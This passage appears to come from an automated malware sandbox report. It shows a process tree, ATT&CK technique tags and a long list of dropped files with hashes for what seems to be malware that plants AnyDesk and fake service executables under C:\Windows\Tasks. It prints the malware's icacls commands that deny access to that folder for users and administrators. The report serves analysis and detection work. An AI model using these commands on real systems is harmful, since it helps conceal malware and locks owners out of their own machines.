C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"
3⤵
PID:1132

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "VUIIVLGQ$:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
3⤵
PID:1264

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
3⤵
PID:1444

C:\Windows\system32\icacls.exe
icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1244

C:\Windows\Tasks\Wrap.exe
C:\Windows\Tasks\Wrap.exe
3⤵
- Executes dropped EXE
PID:1868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
4⤵
- Loads dropped DLL
PID:992

C:\Windows\Tasks\ApplicationsFrameHost.exe
C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2080

C:\Windows\Tasks\MSTask.exe
C:\Windows\Tasks\MSTask.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:2172

C:\Windows\TEMP\~MpF01A.tmp\~Ma4650.exe
"C:\Windows\TEMP\~MpF01A.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2256

C:\Windows\Tasks\Superfetch.exe
C:\Windows\Tasks\Superfetch.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2156

C:\ProgramData\AnyDesk\AnyDesk.exe
C:\ProgramData\AnyDesk\anydesk.exe --get-id
1⤵
PID:2392

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
58B

MD5
77ae1fc149007f8910f5d869c0c047b7

SHA1
3132b12bf5f45520497d7ed2392fc4a2448ab805

SHA256
904c374bb4bc06ce3c1d4ffb173199dfb93c17f3403d9a4fcf65c66639116912

SHA512
1ad9b1fc52bbd43c80b6d6354fb0bd3e1a1ffa1eb6e4991aa791cff180b12489c1a5649f1367cd31fea5f41a55c8045de1ff851931fbeb564f326364fe7b61b8

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
4c2d10154ce597ea43393fb563a4b538

SHA1
238de460e12e9d097881793e7036287a1d2fff80

SHA256
90bd15858038aff362cabff59174e3150d6d29639b56721b31f54473e9f1f90b

SHA512
05f5dca3a2aa670ec4b07c4fb1e281265f9e3477fa36b2477a923a52abb770d332b7fb7bf8ba461a65710500ba856ada85d06530110ecf0ca911a8589896039b

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
482B

MD5
4c2d10154ce597ea43393fb563a4b538

SHA1
238de460e12e9d097881793e7036287a1d2fff80

SHA256
90bd15858038aff362cabff59174e3150d6d29639b56721b31f54473e9f1f90b

SHA512
05f5dca3a2aa670ec4b07c4fb1e281265f9e3477fa36b2477a923a52abb770d332b7fb7bf8ba461a65710500ba856ada85d06530110ecf0ca911a8589896039b

Download Submit
C:\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\ProgramData\curl.exe
Filesize
5.2MB

MD5
c2a78f5c5f3ecbda0e1a29c65cda846b

SHA1
b6ce8eb478d74e567b57dda055fa12a824b2a135

SHA256
e03119a5ee5e8780825335391dc1ab754ce70543537d2bf127964a45d5f365a2

SHA512
02ff813acf7cacf9a2ca6c4b098ff6cfe5a1130f4a7861d46c95d3d826a7e462ada7c5f77aafd81849d685f95a84e47295bb00a8964ad49c8085248bc55d2fed

Download Submit
C:\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\ProgramData\migrate.exe
Filesize
6.6MB

MD5
4d877cab8a19afea517ba4436805ce77

SHA1
7210160bd527a3b726ad0686613bff358823de41

SHA256
e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d

SHA512
af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
4KB

MD5
c64f2d6697789d937a37d84264321fd2

SHA1
3dc7557309b2db3a4866254e8cf206648f5d3c77

SHA256
dc927e2a07a286a9f38fc94c1227b6c8da38083e2e7b792a34a0334fdf7dd742

SHA512
d3d61354d3d7f7334b76c9f9602aa21ee11d7a014e6f9fd8da98d68c02853c790887af8705e14cecb47780915a4eb50377c5e55413a67536139acc26abbd31bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
29f9d23d98c3078f5e2059e1f0e7703d

SHA1
8523067b2957573b37857b7a414d85f87123ffd7

SHA256
49045d2024abeb2b5aff94c3c6e72fa9d8374f46a23aa47ac2d430625420af94

SHA512
0a88ac54dfe9a8a80618d5b2bfaa7d95d9e8a6efc6e775f4974444cfa9208c31b2aeb8a37d350f65a6101c92de29d543a08b61f6aa243671b018527fbbad6646

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1f3da717e04036ec77a5076920e1ee6a

SHA1
4bd7af10d46591a514e95532235bba637ccec9f1

SHA256
8de099263a7597aa5dc79cabe895703a9575bc70831ae13a27c0314d50de7a7f

SHA512
f76394c9314e90e40bd92b82795f1c420d983ce578c48c59bbd6f1f480d4711ff55199b0b933f0a7778daa5b4252df94fbf4c4575eef3951fc688dfb180597c2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
a3df28e54d91073d472d483d14aab227

SHA1
1162f4dea4c3e74fa2e4ce94b1baf500d55e7f59

SHA256
4509476768eb8d1e0018b21c2c9bc0ba38a7d32d2fefe9cd8a618f66937b89a3

SHA512
2b2beb4fa06f1d204569a51eb6a95eb52b6017f089166fcb6178df47de80d8a5b162e56eebab3258b32d28e2f2b958034336c8d691aee523dee1ec22d3422e7a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
3e0546e5e015d42ec12f70dc74146041

SHA1
0ad3f5bb43903ad1fce5c44325bf54a0bce04743

SHA256
c70b6a4e1018b92f6076e5e106cce963e51c2a98d8297e8be9836d30e7c6335e

SHA512
3f42738bfa98b09d591c0f5cb47606d8be288d3d727b0f1f1033ee54d0b17c3f484a30c89451199a41d34632317923f0a548a7af3d6088407b6789bcaecf2961

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
3e0546e5e015d42ec12f70dc74146041

SHA1
0ad3f5bb43903ad1fce5c44325bf54a0bce04743

SHA256
c70b6a4e1018b92f6076e5e106cce963e51c2a98d8297e8be9836d30e7c6335e

SHA512
3f42738bfa98b09d591c0f5cb47606d8be288d3d727b0f1f1033ee54d0b17c3f484a30c89451199a41d34632317923f0a548a7af3d6088407b6789bcaecf2961

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini
Filesize
233B

MD5
cd4326a6fd01cd3ca77cfd8d0f53821b

SHA1
a1030414d1f8e5d5a6e89d5a309921b8920856f9

SHA256
1c59482111e657ef5190e22de6c047609a67e46e28d67fd70829882fd8087a9c

SHA512
29ce5532fb3adf55caa011e53736507fbf241afee9d3ca516a1d9bffec6e5cb2f87c4cd73e4da8c33b8706f96ba3b31f13ce229746110d5bd248839f67ec6d67

Download Submit
C:\Windows\Tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\programdata\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\programdata\any.bat
Filesize
2KB

MD5
7189281b9182a9a412a92af69b77c836

SHA1
d98322de39d62e8d5e6f8fb7fe2ce30f578a4853

SHA256
baae6af47a9b83c57269d62cf17e4d68927adee93e5567ce2bb5ae33cbe845eb

SHA512
211be9213611bdbd44b2dac2462d0688c02f352c6c55cc6602d84b0a8ceff9a96ca79f6989ce825c8ecedf65fb13e6583fb92fb56c551bf61948320f12cbb6be

Download Submit
C:\programdata\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
C:\programdata\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
C:\programdata\ru.bat
Filesize
32B

MD5
11e08b5abf3f1675f99c96f78c128b23

SHA1
40d6dd08262ef959328aec4dc5ed07532232037c

SHA256
50ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7

SHA512
3005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9

Download Submit
C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe
Filesize
198B

MD5
f3fbd4e6a0097ff2d729be2b6e494e80

SHA1
abed54083af60944e4628718061fa6b9ce402594

SHA256
b7d74a96173fd177dceead637138814738b68799b018437dbd4ba20213977e56

SHA512
f9a7f899cdc423a3214072de0a2858f212e15d9055b22cbb8536d20cea3fe199e3f44f3183c6d3e41e85a04b2b47e0497ead13eeb49e67f91e44cb19fe4a0f57

Download Submit
C:\windows\tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
C:\windows\tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
C:\windows\tasks\run.bat
Filesize
338B

MD5
20a377ca25c7fcdff75b3720ba83e11c

SHA1
ad3ceb92df33714c7d3f517a77b1086797d72c47

SHA256
280e5ccacd1622f61cfd675f4ae1204790bd5aea648d0e51145d01a772d792ad

SHA512
b4f2d5a1c8cbdfd7cc3f6d106735e816572bb0a177b302263fa9267625bca7d77f49b5e86252c3632ce9e05e4e5ba7730e7555ac465ed5b46f913de4739cecc6

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\programdata\migrate.exe
Filesize
6.6MB

MD5
4d877cab8a19afea517ba4436805ce77

SHA1
7210160bd527a3b726ad0686613bff358823de41

SHA256
e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d

SHA512
af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc

Download Submit
\??\c:\programdata\st.bat
Filesize
4KB

MD5
dc437e9b2b38072a8c164f1eef87e20a

SHA1
851942f95439fe45122b652fb966769752756969

SHA256
dc2df9ac0756b07420e2ffd7694e97a6e07bd0332fab964661d4ebc253e00b2f

SHA512
4029f6bd65df524207aad3215f0e69d74056ff1a5fa80be2d285c5e8cd55caa5962fe33530b577110d86c78da69f29bd3f09612e817b0989bc8aa9dc30a3739f

Download Submit
\??\c:\programdata\wsappy.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\AnyDesk\AnyDesk.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
\ProgramData\any.exe
Filesize
6.1MB

MD5
83834462455be62ccf135f3137263119

SHA1
f23d183db2adf37e80469191c7d452e8d39935b6

SHA256
565c7756135d7858e8963928fff8d1fdb99a452d8568319aeda4a073f51d0a23

SHA512
7aa6374b4bafae925a1da59212fdb7f262f98848c058173777c0f30c61243b982cfc3d13ce106e9eb59cfb9957c81a5b496e82a5522e9209f0c30f53f864c411

Download Submit
\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
\ProgramData\dc.exe
Filesize
1.3MB

MD5
dae7ec3880731dcd27311b4e1dab5e49

SHA1
52d88c8917cbbe4c40bf2e3a67ef8eaad2b52ffc

SHA256
59a058a95f24d57c98b1801a1bc1e1545db8be230a628e2f7dcc34c0452f2d19

SHA512
8064f3819c815db7cafe243de781bd7755f208ea932f383687421ecd56d610c1929426f6ca55b592e51147386f2ece42bc9b2ebb5a208381a510f9dd88d6e5da

Download Submit
\ProgramData\migrate.exe
Filesize
6.6MB

MD5
4d877cab8a19afea517ba4436805ce77

SHA1
7210160bd527a3b726ad0686613bff358823de41

SHA256
e2eee92ef0ffc25134049dd0301d464bf8e7b814ba04b25749dea8c0b7cbc29d

SHA512
af9ce52af8d3a6987eb50fd17cbae170195872e8ca2d65db5198842f185d4cba2b70e9d2d0e9cdeb1cb80bd1adaf1674eec84797d65a8c2e236b18261fe018bc

Download Submit
\ProgramData\wsappz.exe
Filesize
3.8MB

MD5
9a1d9fe9b1223273c314632d04008384

SHA1
665cad3ed21f6443d1adacf18ca45dfaa8f52c99

SHA256
0f4bf8506a2560c568b9815124dfc43a11c561ed611829df841ec7aba8302359

SHA512
3ec400acd075a4078d7d9f06c853be4ee0fdd7a9d1628428326534df6c0f3ea8f745af9d29031e9259a1bee2f78dd48dfaebcb7e897c22736909a9d6b4f24ba5

Download Submit
\Windows\Tasks\IntelConfigService.exe
Filesize
1.8MB

MD5
58e4115267b276452edc1f541e3a8198

SHA1
ec40b6cce5c9a835563c17da81997e8010ac9cad

SHA256
713120bac7807f6fc0a6050135556c0614a66be2fb476cfe163877f3d03b4d08

SHA512
3def4b7f7fbeab01826eb733174bca64860f8bfbad3baec361b65b07b4558e28830fcc2deb264622199f9474277f04e562830bc5f0bf8a0e7932d002f1a812c5

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
